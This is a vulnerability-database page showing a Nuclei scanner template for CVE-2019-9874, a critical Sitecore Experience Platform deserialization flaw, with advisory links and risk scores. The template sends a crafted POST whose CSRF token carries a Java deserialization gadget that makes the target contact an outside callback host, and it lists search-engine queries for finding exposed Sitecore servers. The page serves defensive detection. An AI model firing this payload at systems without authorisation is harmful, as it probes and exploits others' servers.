Vulners
Lucene search
Sitecore Experience Platform - Deserialization of Untrusted Data
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2019-9874 | 31 May 201900:00 | – | attackerkb |
 | CVE-2019-9874 | 26 Mar 202518:45 | – | circl |
 | Sitecore CMS and Experience Platform (XP) Deserialization Vulnerability | 26 Mar 202500:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 26 Mar 202512:00 | – | cisa |
 | CVE-2019-9874 | 31 May 201920:11 | – | cve |
 | CVE-2019-9874 | 31 May 201920:11 | – | cvelist |
 | CVE-2019-9874 | 31 May 201921:29 | – | nvd |
 | CVE-2019-9874 | 31 May 201921:29 | – | osv |
 | Deserialization of untrusted data | 31 May 201921:29 | – | prion |
 | PT-2019-19908 · Sitecore · Sitecore Xp +2 | 31 May 201900:00 | – | ptsecurity |
10
id: CVE-2019-9874
info:
name: Sitecore Experience Platform - Deserialization of Untrusted Data
author: ritikchaddha
severity: critical
description: |
Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.
impact: |
Attackers can execute arbitrary code remotely, potentially leading to full system compromise.
remediation: |
Update to the latest version of Sitecore or apply security patches addressing deserialization issues.
reference:
- https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2019-9874
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9874
epss-score: 0.83857
epss-percentile: 0.99655
cwe-id: CWE-502
cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: sitecore
product: experience_platform
shodan-query: http.html:"SitecoSitecore Experience Platform"
fofa-query: body="Sitecore Experience Platform"
tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln
http:
- raw:
- |
POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: __CSRFCOOKIE={{randstr}};
__CSRFTOKEN={{generate_java_gadget("dns", "https://{{interactsh-url}}", "base64")}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PotentialCsrfException"
- "deserialization"
condition: and
case-insensitive: true
- type: status
status:
- 500
# digest: 4b0a00483046022100a72332e6dd8a1f3e41fa1ee02415548e5e6fcfe09ff52bc8f554e82b6fcd4684022100db00cc05659a60d0451e2870f0bee40e6acf2372567d52a2e66660839f3a9bf6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.3High risk
Vulners AI Score8.3
CVSS 27.5
CVSS 3.19.8
EPSS0.83857
SSVC